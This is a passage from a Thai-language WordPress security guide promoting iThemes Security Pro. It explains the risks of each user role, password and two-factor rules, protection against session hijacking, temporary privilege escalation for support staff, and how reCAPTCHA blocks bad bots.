ในการตั้งค่าอุปกรณ์ที่เชื่อถือได้ ให้ตัดสินใจว่าผู้ใช้รายใดที่คุณต้องการใช้คุณลักษณะนี้ จากนั้นเปิดใช้งานคุณลักษณะ จำกัดความสามารถ และ การป้องกันการลักลอบใช้เซสชัน

หลังจากเปิดใช้งานการตั้งค่าอุปกรณ์ที่เชื่อถือได้ใหม่ ผู้ใช้จะได้รับการแจ้งเตือนในแถบผู้ดูแลระบบ WordPress เกี่ยวกับอุปกรณ์ที่ไม่รู้จักที่รอดำเนินการ หากอุปกรณ์ปัจจุบันของคุณไม่ได้ถูกเพิ่มลงในรายการอุปกรณ์ที่เชื่อถือได้ ให้คลิกที่ลิงก์ ยืนยันอุปกรณ์นี้ เพื่อส่งอีเมลการให้สิทธิ์

คลิกปุ่ม ยืนยันอุปกรณ์ ในอีเมลเข้าสู่ระบบที่ไม่รู้จักเพื่อเพิ่มอุปกรณ์ปัจจุบันของคุณในรายการอุปกรณ์ที่เชื่อถือได้

ห่อ

ความสามารถในการเข้าถึงของหน้าเข้าสู่ระบบ WordPress ทำให้เป็นส่วนที่ถูกโจมตีและมีโอกาสเสี่ยงมากที่สุดของไซต์ WordPress ใดๆ อย่างไรก็ตาม การใช้ขั้นตอนในส่วนนี้จะทำให้การเข้าสู่ระบบ WordPress ของคุณแทบจะเข้าถึงไม่ได้

ส่วนที่ 7: การรักษาความปลอดภัยผู้ใช้ WordPress ของคุณ

เมื่อใดก็ตามที่เราพูดถึงความปลอดภัยของผู้ใช้ เรามักจะได้ยินคำถามเช่น ผู้ใช้ WordPress ทุกคนควรมีข้อกำหนดด้านความปลอดภัยเหมือนกันหรือไม่ และความปลอดภัยมีมากน้อยเพียงใด?

ไม่ต้องกังวล เราตอบคำถามเหล่านี้ทั้งหมด แต่ก่อนอื่น เรามาพูดถึงผู้ใช้ WordPress ประเภทต่างๆ กันก่อน

ผู้ใช้ WordPress ประเภทต่าง ๆ มีอะไรบ้าง?

มีผู้ใช้ WordPress เริ่มต้นที่แตกต่างกัน 5 คน

1. ผู้ดูแลระบบ
2. บรรณาธิการ
3. ผู้เขียน
4. ผู้ร่วมให้ข้อมูล
5. สมาชิก

ผู้ใช้แต่ละคนมีความสามารถที่แตกต่างกัน ความสามารถกำหนดสิ่งที่พวกเขาสามารถทำได้เมื่อเข้าถึงแดชบอร์ด อ่านเพิ่มเติมเกี่ยวกับบทบาทผู้ใช้ WordPress และการอนุญาต

ความเสียหายที่อาจเกิดขึ้นกับผู้ใช้ WordPress ที่ถูกแฮ็กต่างกัน

ก่อนที่เราจะสามารถเข้าใจวิธีการรักษาความปลอดภัยให้กับผู้ใช้ WordPress ของเรา เราต้องเข้าใจระดับภัยคุกคามของผู้ใช้ที่ถูกบุกรุกแต่ละประเภทเสียก่อน ประเภทและระดับของความเสียหายที่ผู้โจมตีสามารถสร้างได้นั้นแตกต่างกันไปตามบทบาทและความสามารถของผู้ใช้ที่แฮ็ค

ผู้ดูแลระบบ – ระดับภัยคุกคามสูง

ผู้ ใช้ผู้ ดูแลระบบ มีความสามารถในสิ่งที่พวกเขาต้องการ

• สร้าง ลบ และแก้ไขผู้ใช้
• ติดตั้ง ลบ และแก้ไขปลั๊กอินและธีม
• สร้าง ลบ และแก้ไขโพสต์และหน้าทั้งหมด
• เผยแพร่และยกเลิกการเผยแพร่โพสต์และเพจ
• เพิ่มและลบสื่อ

หากแฮ็กเกอร์สามารถจัดการกับหนึ่งในผู้ดูแลระบบของไซต์ของคุณ พวกเขาก็สามารถเรียกค่าไถ่เว็บไซต์ของคุณได้ ดังที่เราได้กล่าวไว้ก่อนหน้านี้ Ransomware หมายถึงเวลาที่แฮ็กเกอร์เข้ายึดเว็บไซต์ของคุณและจะไม่ปล่อยมันคืนให้คุณเว้นแต่คุณจะจ่ายค่าธรรมเนียมจำนวนมากให้พวกเขา

บรรณาธิการ – ระดับภัยคุกคามสูง

บรรณาธิการ จัดการเนื้อหาทั้งหมดของเว็บไซต์ ผู้ใช้เหล่านี้ยังคงมีพลังอยู่บ้าง

• สร้าง ลบ และแก้ไขโพสต์และหน้าทั้งหมด
• เผยแพร่และยกเลิกการเผยแพร่โพสต์และหน้าทั้งหมด
• อัปโหลดไฟล์มีเดีย
• จัดการลิงก์ทั้งหมด
• จัดการความคิดเห็น
• จัดการหมวดหมู่

หากผู้โจมตีเข้าควบคุมบัญชีของบรรณาธิการ พวกเขาสามารถแก้ไขหน้าใดหน้าหนึ่งของคุณเพื่อใช้ในการโจมตีแบบฟิชชิง ฟิชชิ่ง เป็นการโจมตีประเภทหนึ่งที่ใช้ในการขโมยข้อมูลผู้ใช้ รวมถึงข้อมูลรับรองการเข้าสู่ระบบและหมายเลขบัตรเครดิต

ฟิชชิงเป็นวิธีที่แน่นอนที่สุดวิธีหนึ่งในการทำให้เว็บไซต์ของคุณถูกขึ้นบัญชีดำโดย Google ในแต่ละวัน มีเว็บไซต์กว่า 10,000 แห่งเข้ามาอยู่ในรายการบล็อกของ Google ด้วยเหตุผลหลายประการ

ผู้เขียน – ระดับภัยคุกคามขนาดกลาง

ผู้เขียน ได้รับการออกแบบมาเพื่อสร้างและจัดการเนื้อหาของตนเอง

• สร้าง ลบ และแก้ไขโพสต์และเพจของตนเอง
• เผยแพร่และยกเลิกการเผยแพร่โพสต์ของตนเอง
• อัพโหลดไฟล์มีเดีย

หากผู้โจมตีต้องเข้าควบคุมบัญชีของผู้เขียน พวกเขาสามารถสร้างหน้าและโพสต์ที่ส่งผู้เยี่ยมชมเว็บไซต์ของคุณไปยังเว็บไซต์ที่เป็นอันตราย

Contributor & Subscriber – ระดับภัยคุกคามต่ำ

Contributor เป็นเวอร์ชัน Lite ของบทบาทผู้ใช้ของผู้เขียน พวกเขาไม่มีอำนาจเผยแพร่

• สร้างและแก้ไขโพสต์ของตนเอง
• ลบโพสต์ที่ไม่ได้เผยแพร่ของตนเอง

สมาชิก สามารถอ่านสิ่งที่ผู้ใช้รายอื่นเผยแพร่

แม้ว่าแฮ็กเกอร์ที่มีบทบาทเป็นผู้สนับสนุนหรือสมาชิกจะไม่สามารถทำการเปลี่ยนแปลงที่เป็นอันตรายได้ แต่ก็สามารถขโมยข้อมูลที่ละเอียดอ่อนที่จัดเก็บไว้ในบัญชีหรือหน้าโปรไฟล์ของผู้ใช้ได้

6 เคล็ดลับในการรักษาความปลอดภัยให้กับผู้ใช้ WordPress ของคุณ

โอเค นั่นเป็นสิ่งที่น่ารังเกียจทีเดียวที่แฮ็กเกอร์สามารถทำกับเว็บไซต์ของเราได้ ข่าวดีก็คือการโจมตีส่วนใหญ่ในบัญชีผู้ใช้ WordPress ของคุณสามารถป้องกันได้โดยใช้ความพยายามเพียงเล็กน้อยจากคุณ

มาดูสิ่งที่คุณสามารถทำได้เพื่อรักษาความปลอดภัยให้กับผู้ใช้ WordPress ของคุณ ความจริงก็คือวิธีการรักษาความปลอดภัย WordPress เหล่านี้จะช่วยปกป้องผู้ใช้ WordPress ทุกประเภท แต่ในขณะที่เราดำเนินการผ่านแต่ละวิธี เราจะแจ้งให้คุณทราบว่าผู้ใช้รายใดที่คุณควรกำหนดให้ใช้วิธีนี้

1. ให้ความสามารถที่จำเป็นแก่ผู้คนเท่านั้น

วิธีที่ง่ายที่สุดที่คุณสามารถปกป้องเว็บไซต์ของคุณได้คือการให้ความสามารถที่พวกเขาต้องการแก่ผู้ใช้เท่านั้น และไม่ทำอะไรมากไปกว่านี้ ถ้าสิ่งเดียวที่ใครบางคนจะทำบนเว็บไซต์ของคุณคือการสร้างและแก้ไขโพสต์ในบล็อกของตนเอง พวกเขาไม่จำเป็นต้องมีความสามารถในการแก้ไขโพสต์ของคนอื่น

2. รักษาความปลอดภัยผู้ใช้ WordPress ด้วยรหัสผ่านที่รัดกุม

ในรายการที่รวบรวมโดย Splash Data รหัสผ่านที่พบบ่อยที่สุดที่รวมอยู่ในการถ่ายโอนข้อมูลทั้งหมดคือ 123456 การถ่ายโอนข้อมูลคือฐานข้อมูลที่ถูกแฮ็กซึ่งเต็มไปด้วยรหัสผ่านของผู้ใช้ที่ ถูกทิ้งที่ ใดที่หนึ่งบนอินเทอร์เน็ต คุณลองนึกดูว่ามีคนกี่คนในเว็บไซต์ของคุณที่ใช้รหัสผ่านที่ไม่รัดกุม ถ้ารหัสผ่าน 123456 เป็นรหัสผ่านที่พบบ่อยที่สุดในการถ่ายโอนข้อมูล

การใช้รหัสผ่านที่ไม่รัดกุมก็เหมือนกับการพยายามล็อกประตูหน้าด้วยเทปพันแผ่น ไม่เคยใช้เวลานานนักที่แฮ็กเกอร์จะใช้กำลังเดรัจฉานผ่านรหัสผ่านที่ไม่รัดกุมไปยังเว็บไซต์ ขณะนี้แฮกเกอร์ใช้ประโยชน์จากการ์ดกราฟิกของคอมพิวเตอร์ในการโจมตี เวลาในการถอดรหัสรหัสผ่านก็ไม่เคยลดลง

ตัวอย่างเช่น มาดูแผนภูมิที่สร้างโดย Terahash บริษัทถอดรหัสรหัสผ่านที่มีประสิทธิภาพสูง แผนภูมิแสดงเวลาที่ใช้ในการถอดรหัสรหัสผ่านโดยใช้คลัสเตอร์แฮชสแต็ก 448x RTX 2080

ตามค่าเริ่มต้น WordPress ใช้ MD5 เพื่อแฮชรหัสผ่านของผู้ใช้ที่จัดเก็บไว้ในฐานข้อมูล WP ตามแผนภูมินี้ Terahash สามารถถอดรหัสรหัสผ่าน 8 ตัว … เกือบจะในทันที นั่นไม่เพียงแต่น่าประทับใจอย่างยิ่ง แต่ยังน่ากลัวจริงๆ ด้วย ข่าวดีก็คือเราสามารถรักษาความปลอดภัยในการเข้าสู่ระบบ WordPress ของเราโดยกำหนดให้ผู้ใช้ระดับสูงของเราใช้รหัสผ่านที่รัดกุม

คุณลักษณะ ข้อกำหนดรหัสผ่าน iThemes Security Pro ช่วยให้คุณสามารถบังคับให้ผู้ใช้บางรายใช้รหัสผ่านที่รัดกุม เปิดใช้งานคุณสมบัติ ข้อกำหนดรหัสผ่าน ในหน้าหลักของการตั้งค่าความปลอดภัย จากนั้นเลือกผู้ใช้ที่คุณต้องการกำหนดให้ใช้รหัสผ่านที่รัดกุม

3. ปฏิเสธรหัสผ่านที่ถูกบุกรุก

ตามรายงานการตรวจสอบการละเมิดข้อมูลของ Verizon พนักงานกว่า 70% ใช้รหัสผ่านซ้ำในที่ทำงาน แต่สถิติที่สำคัญที่สุดจากรายงานคือ 81% ของการละเมิดที่เกี่ยวข้องกับการแฮ็กใช้ประโยชน์จากรหัสผ่านที่ขโมยมาหรือรหัสผ่านที่ไม่รัดกุม

แฮกเกอร์ใช้รูปแบบของการโจมตีแบบดุร้ายที่เรียกว่าการโจมตีแบบพจนานุกรม การโจมตีด้วยพจนานุกรมเป็นวิธีการเจาะเข้าไปในเว็บไซต์ WordPress ด้วยรหัสผ่านที่ใช้กันทั่วไปซึ่งปรากฏในการถ่ายโอนข้อมูลของฐานข้อมูล “คอลเลกชั่น #1? การละเมิดข้อมูลที่โฮสต์บน MEGA รวมที่อยู่อีเมลและรหัสผ่านที่ไม่ซ้ำกัน 1,160,253,228 ชุด นั่นคือพันล้านด้วย a คะแนนประเภทนี้จะช่วยให้การโจมตีพจนานุกรมจำกัดรหัสผ่าน WordPress ที่ใช้บ่อยที่สุดได้จริง

จำเป็นต้องป้องกันไม่ให้ผู้ใช้ที่มีความสามารถระดับผู้เขียนขึ้นไปใช้รหัสผ่านที่ถูกบุกรุกเพื่อรักษาความปลอดภัยการเข้าสู่ระบบ WordPress ของคุณ คุณอาจคิดถึงการไม่ให้ผู้ใช้ระดับล่างของคุณใช้รหัสผ่านที่ถูกบุกรุก

เป็นที่เข้าใจได้อย่างสมบูรณ์และสนับสนุนให้สร้างบัญชีลูกค้าใหม่ให้ง่ายที่สุด อย่างไรก็ตาม ลูกค้าของคุณอาจไม่ทราบว่ามีการพบรหัสผ่านที่พวกเขาใช้ในการถ่ายโอนข้อมูล คุณจะให้บริการที่ยอดเยี่ยมแก่ลูกค้าของคุณโดยแจ้งเตือนพวกเขาว่ารหัสผ่านที่พวกเขาใช้นั้นถูกบุกรุก หากพวกเขาใช้รหัสผ่านนั้นในทุกๆ ที่ คุณก็สามารถช่วยพวกเขาให้พ้นจากปัญหาใหญ่ๆ ที่เกิดขึ้นระหว่างทางได้

คุณลักษณะ iThemes Security Pro ปฏิเสธรหัสผ่านที่ถูกบุกรุก บังคับให้ผู้ใช้ใช้รหัสผ่านที่ไม่ปรากฏในการละเมิดรหัสผ่านใด ๆ ที่ติดตามโดยฉันเคยถูก Pwned เปิดใช้งานคุณสมบัติ ข้อกำหนดของรหัสผ่าน ในหน้าหลักของการตั้งค่าความปลอดภัย จากนั้นเลือกผู้ใช้ที่คุณต้องการป้องกันการใช้รหัสผ่านที่ถูกบุกรุก

4. รักษาความปลอดภัยผู้ใช้ WordPress ด้วยการตรวจสอบสิทธิ์สองปัจจัย

การใช้การรับรองความถูกต้องด้วยสองปัจจัยเป็นสิ่งที่ดีที่สุดที่คุณสามารถทำได้เพื่อรักษาความปลอดภัยการเข้าสู่ระบบ WordPress ของคุณ การรับรองความถูกต้องด้วยสองปัจจัยเป็นกระบวนการในการยืนยันตัวตนของบุคคลโดยกำหนดให้มีการตรวจสอบสองวิธีแยกกัน Google แบ่งปันในบล็อกว่าการใช้การรับรองความถูกต้องด้วยสองปัจจัยสามารถหยุดการโจมตีบอทอัตโนมัติได้ 100% ฉันชอบอัตราต่อรองเหล่านั้นจริงๆ

คุณลักษณะการ ตรวจสอบสิทธิ์สองปัจจัยของ iThemes Security Pro มอบความยืดหยุ่นมากมายเมื่อใช้งาน 2fa บนเว็บไซต์ของคุณ คุณสามารถเปิดใช้งานสองปัจจัยสำหรับผู้ใช้ของคุณทั้งหมดหรือบางส่วน และคุณสามารถบังคับให้ผู้ใช้ระดับสูงของคุณใช้ 2fa ในการเข้าสู่ระบบแต่ละครั้ง

เพื่อความสะดวกของคุณ iThemes Security Pro เสนอวิธีการตรวจสอบสิทธิ์แบบสองปัจจัยที่แตกต่างกัน 2 วิธี

1. แอพมือถือ - วิธีแอพมือถือเป็นวิธีที่ปลอดภัยที่สุดของการรับรองความถูกต้องด้วยสองปัจจัยที่จัดทำโดย iThemes Security Pro วิธีนี้กำหนดให้คุณต้องใช้แอปมือถือสองปัจจัยฟรี เช่น Authy
2. อีเมล – วิธีการอีเมลแบบสองปัจจัยจะส่งรหัสที่คำนึงถึงเวลาไปยังที่อยู่อีเมลของผู้ใช้ของคุณ
3. รหัสสำรอง – ชุดรหัสแบบใช้ครั้งเดียวที่สามารถใช้เพื่อเข้าสู่ระบบในกรณีที่วิธีการหลักสองปัจจัยหายไป

5. รักษาความปลอดภัยผู้ใช้ WordPress จากการจี้เซสชัน

WordPress สร้างคุกกี้เซสชั่นทุกครั้งที่คุณเข้าสู่เว็บไซต์ของคุณ และสมมติว่าคุณมีส่วนขยายเบราว์เซอร์ที่นักพัฒนาละทิ้งและไม่ได้เผยแพร่การอัปเดตความปลอดภัยอีกต่อไป น่าเสียดายสำหรับคุณ ส่วนขยายเบราว์เซอร์ที่ถูกละเลยมีช่องโหว่ ช่องโหว่นี้ทำให้ผู้ไม่หวังดีสามารถจี้คุกกี้เบราว์เซอร์ของคุณ รวมถึงคุกกี้เซสชัน WordPress ที่กล่าวถึงก่อนหน้านี้ การแฮ็กประเภทนี้เรียกว่า Session Hijacking ดังนั้น ผู้โจมตีสามารถใช้ช่องโหว่ของส่วนขยายเพื่อดึงข้อมูลการเข้าสู่ระบบของคุณออกและเริ่มทำการเปลี่ยนแปลงที่เป็นอันตรายกับผู้ใช้ WordPress ของคุณ

คุณควรมีระบบป้องกันการไฮแจ็กเซสชันสำหรับผู้ดูแลระบบและบรรณาธิการของคุณ

ฟีเจอร์ iThemes Security Pro Trusted Devices ทำให้ Session Hijacking กลายเป็นอดีตไปแล้ว หากอุปกรณ์ของผู้ใช้เปลี่ยนแปลงระหว่างเซสชัน iThemes Security จะล็อกผู้ใช้ออกโดยอัตโนมัติ เพื่อป้องกันกิจกรรมที่ไม่ได้รับอนุญาตในบัญชีของผู้ใช้ เช่น การเปลี่ยนที่อยู่อีเมลของผู้ใช้หรือการอัปโหลดปลั๊กอินที่เป็นอันตราย

6. สร้างผู้ใช้สนับสนุนสากล

ทุกครั้งที่คุณสร้างผู้ใช้ใหม่ คุณกำลังเพิ่มจุดเริ่มต้นอื่นที่แฮ็กเกอร์สามารถใช้ประโยชน์ได้ แต่อาจมีบางครั้งที่คุณอาจต้องการความช่วยเหลือจากภายนอกสำหรับเว็บไซต์ของคุณ เช่น เมื่อคุณกำลังมองหาการสนับสนุนหรือหลังจากจ้างผู้รับเหมาอิสระ คุณต้องมีวิธีการที่ปลอดภัยในการเพิ่มการเข้าถึงของผู้ดูแลระบบชั่วคราวในเว็บไซต์ของคุณ

ตัวอย่างเช่น สมมติว่าคุณประสบปัญหาบางอย่างกับปลั๊กอินตัวใดตัวหนึ่งที่ติดตั้งบนเว็บไซต์ของคุณ หลังจากติดต่อฝ่ายสนับสนุนแล้ว พวกเขาขอสิทธิ์การเข้าถึงของผู้ดูแลระบบในเว็บไซต์ของคุณเพื่อให้ตรวจสอบได้ละเอียดยิ่งขึ้น ดูเหมือนว่าจะเป็นคำขอที่สมเหตุสมผลอย่างยิ่ง และคุณตัดสินใจให้สิทธิ์การเข้าถึงแก่พวกเขา

แล้วเราจะให้ผู้ดูแลระบบชั่วคราวเข้าถึงเว็บไซต์ WordPress ของเราได้อย่างไร

การให้สิทธิ์การเข้าถึงเว็บไซต์ของคุณจากภายนอก: สองตัวเลือก

โดยทั่วไป คุณมี สองตัวเลือก ในการให้การเข้าถึงเว็บไซต์ของคุณจากภายนอก…. และไม่ดี

1. แบ่งปันข้อมูลประจำตัวของผู้ใช้ของคุณ

ตัวเลือกแรกและ แย่ที่สุด ของคุณคือการแชร์ชื่อผู้ใช้และรหัสผ่านของผู้ดูแลระบบ WordPress ของคุณ

เหตุใดการแบ่งปันข้อมูลรับรองผู้ดูแลระบบของคุณจึงแย่มาก

• ความปลอดภัยที่ลดลง – หากคุณแบ่งปันข้อมูลประจำตัวของผู้ใช้ คุณจะต้องปิดใช้งานการตรวจสอบสิทธิ์แบบสองปัจจัยเพื่อให้ผู้ที่ใช้ข้อมูลประจำตัวของคุณเข้าสู่ระบบได้ Google แชร์ในบล็อกว่าการใช้การตรวจสอบสิทธิ์แบบสองปัจจัยหรือการยืนยันแบบ 2 ขั้นตอนสามารถหยุดการโจมตีบอทอัตโนมัติได้ 100% การปิดใช้งานการตรวจสอบสิทธิ์แบบสองปัจจัย แม้ในช่วงเวลาสั้นๆ จะลดความปลอดภัยของเว็บไซต์ของคุณลงอย่างมาก
• ไม่สะดวก – การแบ่งปันข้อมูลประจำตัวของคุณทำให้คุณต้องเปลี่ยนรหัสผ่าน หากคุณลืมเปลี่ยนรหัสผ่าน แสดงว่ามีคนตั้งแต่หนึ่งคนขึ้นไปที่ผู้ดูแลระบบสามารถเข้าถึงเว็บไซต์ของคุณได้ทุกเมื่อที่ต้องการ

2. สร้างผู้ใช้ใหม่สำหรับ Support Tech

แม้ว่าการสร้างผู้ใช้ที่เป็นผู้ดูแลระบบคนใหม่สำหรับผู้เชี่ยวชาญฝ่ายสนับสนุนจะดีกว่าการแชร์ข้อมูลรับรองผู้ดูแลระบบของคุณ แต่ก็ยังไม่ดีนัก

เหตุใดการสร้างผู้ใช้สำหรับเทคโนโลยีสนับสนุนจึงแย่มาก

• ช่องโหว่ที่เพิ่มขึ้น – การสร้างผู้ใช้ผู้ดูแลระบบรายใหม่จะเพิ่มจุดเข้าใช้งานอีกจุดหนึ่งที่สามารถใช้ประโยชน์ได้ หากคุณไม่มีนโยบายรหัสผ่าน เจ้าหน้าที่ฝ่ายสนับสนุนอาจเลือกรหัสผ่านที่ไม่รัดกุม ทำให้การเข้าสู่ระบบ WordPress ของคุณเสี่ยงต่อการถูกโจมตีมากขึ้น
• ไม่สะดวก – การเข้าสู่ขั้นตอนการตั้งค่าผู้ใช้ใหม่ทุกเมื่อที่คุณต้องการความช่วยเหลือจากภายนอกนั้นใช้เวลานาน คุณต้องสร้างผู้ใช้ใหม่ จากนั้นอย่าลืมลบผู้ใช้เมื่อไม่ต้องการเข้าถึงเว็บไซต์ของคุณอีกต่อไป เป็นแนวทางปฏิบัติที่ดีที่สุดด้านความปลอดภัยของ WordPress เพื่อลบผู้ใช้ที่ไม่ได้ใช้ออกจากเว็บไซต์ของคุณ

การยกระดับสิทธิ์คืออะไร?

คุณลักษณะการยกระดับสิทธิ์ของ iThemes Security Pro ช่วยให้คุณสามารถให้ความสามารถพิเศษแก่ผู้ใช้ได้ชั่วคราว

การยกระดับสิทธิ์ทำให้ง่ายและปลอดภัยในการสร้างผู้ใช้สากลที่คุณสามารถมอบให้กับนักพัฒนาภายนอกหรือสนับสนุนเทคโนโลยีที่ต้องการเข้าถึงเว็บไซต์ของคุณชั่วคราว

ด้วย Privilege Escalation คุณสามารถสร้างผู้ใช้ใหม่และตั้งชื่อให้ Support และกำหนดบทบาทผู้ใช้แบบ Subscriber ครั้งต่อไปที่คุณต้องให้สิทธิ์เข้าถึงเว็บไซต์ของคุณชั่วคราว คุณสามารถชนผู้ใช้ Support จากสมาชิกไปยังผู้ดูแลระบบได้ เราจะอธิบายวิธีการดำเนินการนี้ต่อไปในโพสต์ แต่ก่อนอื่น เรามาพูดถึงสาเหตุที่การยกระดับสิทธิ์เป็นวิธีที่ดีกว่าในการให้สิทธิ์เข้าถึงเว็บไซต์ของคุณ

ทำไมการยกระดับสิทธิ์จึงดีกว่า

• ง่าย – คุณไม่จำเป็นต้องสร้างผู้ใช้ใหม่ทุกครั้งที่ต้องให้สิทธิ์การเข้าถึงเว็บไซต์ของคุณ
• อัตโนมัติ – การยกระดับสิทธิ์จะใช้เวลาเพียง 24 ชั่วโมงเท่านั้น หลังจากครบ 24 ชั่วโมง ผู้ใช้จะสูญเสียสิทธิ์เพิ่มเติมทั้งหมดโดยอัตโนมัติ คุณไม่จำเป็นต้องลบผู้ใช้หรือเปลี่ยนรหัสผ่านใดๆ
• ไม่มีการเสียสละในความปลอดภัย – คุณยังคงสามารถกำหนดให้ผู้ใช้สนับสนุนสากลรายนี้ใช้วิธีอีเมลของสองปัจจัยในการเข้าสู่ระบบ ซึ่งหมายความว่าคุณมีระดับความปลอดภัยเดียวกันกับที่คุณทำกับผู้ใช้ที่เป็นผู้ดูแลระบบรายอื่น เนื่องจากบทบาทของผู้ใช้ที่แท้จริงคือสมาชิก คุณจึงไม่เสี่ยงที่จะทิ้งบทบาทนั้นไว้บนเว็บไซต์ของคุณ

วิธีใช้การยกระดับสิทธิ์ใน iThemes Security Pro

ในการเริ่มต้น ให้เปิดใช้งาน การยกระดับสิทธิ์ ในหน้าหลักของการตั้งค่าความปลอดภัย

คุณสามารถสร้างผู้ใช้ใหม่และตั้งชื่อเป็น Support และกำหนดบทบาทผู้ใช้ของ Subscriber ครั้งต่อไปที่คุณต้องให้สิทธิ์การเข้าถึงเว็บไซต์ของคุณชั่วคราว ให้ไปที่หน้า โปรไฟล์ ของผู้ใช้ Support

อัปเดตที่อยู่อีเมลเพื่อให้เจ้าหน้าที่ภายนอกสามารถขอรหัสผ่านใหม่ได้ จากนั้นเลื่อนลงมาจนกว่าคุณจะเห็นการตั้งค่าการยกระดับสิทธิ์ชั่วคราว คลิกปุ่มสลับ ตั้งค่าบทบาทชั่วคราว แล้วเลือก ผู้ดูแลระบบ ผู้ใช้จะมีสิทธิ์การเข้าถึงระดับผู้ดูแลระบบในอีก 24 ชั่วโมงข้างหน้า

หากไม่ต้องการเวลาเต็ม 24 ชั่วโมง คุณสามารถเพิกถอนการยกระดับสิทธิ์ได้จากหน้าโปรไฟล์ผู้ใช้ หากคุณต้องการมากกว่า 24 ชั่วโมง คุณสามารถกำหนดจำนวนวันที่แน่นอนที่คุณต้องการในช่อง วัน

ห่อ

ความนิยมของ WordPress ทำให้เป็นเป้าหมายของแฮกเกอร์ทั่วโลก ดังที่เราได้กล่าวไปแล้ว ผู้โจมตีสามารถสร้างความเสียหายได้โดยการแฮ็คแม้แต่ผู้ใช้ WordPress ระดับต่ำสุด

ข่าวดีก็คือ แม้ว่าจะไม่มีวิธีใดที่จะป้องกันการโจมตีผู้ใช้ WordPress ของคุณได้ แต่ด้วยความพยายามเพียงเล็กน้อยในส่วนของเรา เราสามารถป้องกันการโจมตีไม่ให้ประสบความสำเร็จได้

ส่วนที่ 8: ปกป้องเว็บไซต์ของคุณจากบอทที่ไม่ดี

ในส่วนนี้ของคู่มือความปลอดภัย WordPress คุณจะได้เรียนรู้ว่าบอทคืออะไรและจะบล็อกบอทที่ไม่ดีอย่างไรไม่ให้สร้างความเสียหายบนเว็บไซต์ของคุณ

บอทคืออะไร?

บอทเป็นซอฟต์แวร์ชิ้นหนึ่งที่ได้รับการตั้งโปรแกรมให้ทำงานเฉพาะรายการ นักพัฒนาสร้างชุดคำสั่งที่บอทจะปฏิบัติตามโดยอัตโนมัติโดยที่นักพัฒนาไม่จำเป็นต้องบอกให้พวกเขาเริ่มต้น บอทจะทำงานซ้ำซากและธรรมดาเร็วกว่าที่เราทำได้

บอทต่างๆ กำลังรวบรวมข้อมูลเว็บไซต์ของคุณอย่างต่อเนื่อง บอทเหล่านี้บางตัวดีและให้บริการที่มีคุณค่าแก่คุณ บอทอื่นๆ มีแรงจูงใจที่ชั่วร้ายมากกว่า มาใช้เวลาสักครู่เพื่อพูดคุยเกี่ยวกับสิ่งที่บอทและบอทประเภทต่างๆ

บอทที่ดี

การตรวจสอบบอท – iThemes Sync Pro Uptime Monitoring ใช้บอทเพื่อตรวจสอบเวลาทำงานของเว็บไซต์ของคุณ บอทจะตรวจสอบเว็บไซต์ของคุณทุกๆ 5 นาทีเพื่อยืนยันว่ายังออนไลน์อยู่ หากเว็บไซต์ของคุณล่ม บอทจะส่งการแจ้งเตือนถึงคุณเพื่อให้คุณกลับมาออนไลน์ได้

บอทตรวจสอบ – การตรวจสอบไซต์ iThemes Sync Pro ใช้บอทของ Google Lighthouse เพื่อตรวจสอบคุณภาพของหน้าเว็บของคุณ อีกตัวอย่างที่ดีของบอทตรวจสอบคือตัวตรวจสอบตัวเชื่อมโยงที่ใช้งานไม่ได้ซึ่งจะรวบรวมข้อมูลเว็บไซต์ของคุณเพื่อค้นหาลิงก์ที่ส่งคุณไปยังตำแหน่งที่ไม่มีอยู่

Feeder Bots – ตัวอย่างที่ดีของ feeder bot คือเครื่องเล่น podcast ของคุณ โปรแกรมเล่นพ็อดคาสท์ของคุณใช้บอทเพื่อตรวจสอบฟีด RSS ของพ็อดคาสท์ที่คุณสมัครรับข้อมูล และเตือนคุณเมื่อพอดคาสต์ที่คุณชื่นชอบออกตอนใหม่

บอทเครื่องมือค้นหา – โปรแกรมรวบรวมข้อมูลเว็บของ Google เป็นตัวอย่างของบอทของเครื่องมือค้นหา บอทประเภทนี้จะรวบรวมข้อมูลเว็บไซต์ของคุณเพื่อค้นหาหน้าใหม่หรือหน้าแก้ไขและสร้างดัชนีของเว็บไซต์ของคุณ เมื่อ Google หรือเสิร์ชเอ็นจิ้นอื่นมีดัชนีของเว็บไซต์ของคุณ พวกเขาจะสามารถแบ่งปันหน้าของคุณกับผู้ที่ใช้เครื่องมือค้นหาของพวกเขาได้

บอทความปลอดภัย – การสแกนไซต์ iThemes Security Pro ใช้บอทเพื่อเปรียบเทียบรายการปลั๊กอินและธีมที่คุณติดตั้งกับฐานข้อมูลช่องโหว่ของเรา หากคุณมีปลั๊กอินหรือธีมติดตั้งพร้อมช่องโหว่ที่ทราบ บอทจะใช้โปรแกรมแก้ไขโดยอัตโนมัติหากมี

บอทตัวร้าย

Content Scraping Bots – บอทเหล่านี้ถูกตั้งโปรแกรมให้ดาวน์โหลดเนื้อหาของเว็บไซต์ของคุณโดยไม่ได้รับอนุญาตจากคุณ บอทสามารถทำซ้ำเนื้อหาเพื่อใช้บนเว็บไซต์ของผู้โจมตีเพื่อปรับปรุง SEO ของพวกเขาและขโมยการเข้าชมเว็บไซต์ของคุณ

สแปมบอท - สแปมบอทเป็นที่น่ารำคาญ พวกเขาจะลบล้างความคิดเห็นของคุณด้วยการสัญญาว่าจะเป็นเศรษฐีในขณะที่ทำงานจากที่บ้านโดยหวังว่าจะส่งผู้เยี่ยมชมของคุณไปยังเว็บไซต์ที่เป็นอันตราย

Brute Force Bots - บอท Brute Force กัดเซาะอินเทอร์เน็ตเพื่อค้นหาการเข้าสู่ระบบ WordPress เพื่อโจมตี เมื่อบ็อตเหล่านี้เข้าสู่หน้าเข้าสู่ระบบ พวกเขาจะลองใช้รูปแบบที่ง่ายที่สุดในการเข้าถึงเว็บไซต์: โดยพยายามเดาชื่อผู้ใช้และรหัสผ่านซ้ำแล้วซ้ำอีก จนกว่าจะสำเร็จ

วิธีบล็อกบอทที่ไม่ดีโดยไม่บล็อกบอทที่ดี: reCAPTCHA V3

Google reCAPTCHA ช่วยป้องกันไม่ให้บอทที่ไม่ดีมีส่วนร่วมในกิจกรรมที่ไม่เหมาะสมบนเว็บไซต์ของคุณ เช่น การพยายามเจาะเข้าไปในเว็บไซต์ของคุณโดยใช้รหัสผ่านที่ถูกบุกรุก การโพสต์สแปม หรือแม้แต่การคัดลอกเนื้อหาของคุณ

อย่างไรก็ตาม ผู้ใช้ที่ถูกต้องตามกฎหมายจะสามารถเข้าสู่ระบบ ซื้อสินค้า ดูเพจ หรือสร้างบัญชีได้ reCAPTCHA ใช้เทคนิคการวิเคราะห์ความเสี่ยงขั้นสูงเพื่อแยกมนุษย์และบอทออกจากกัน

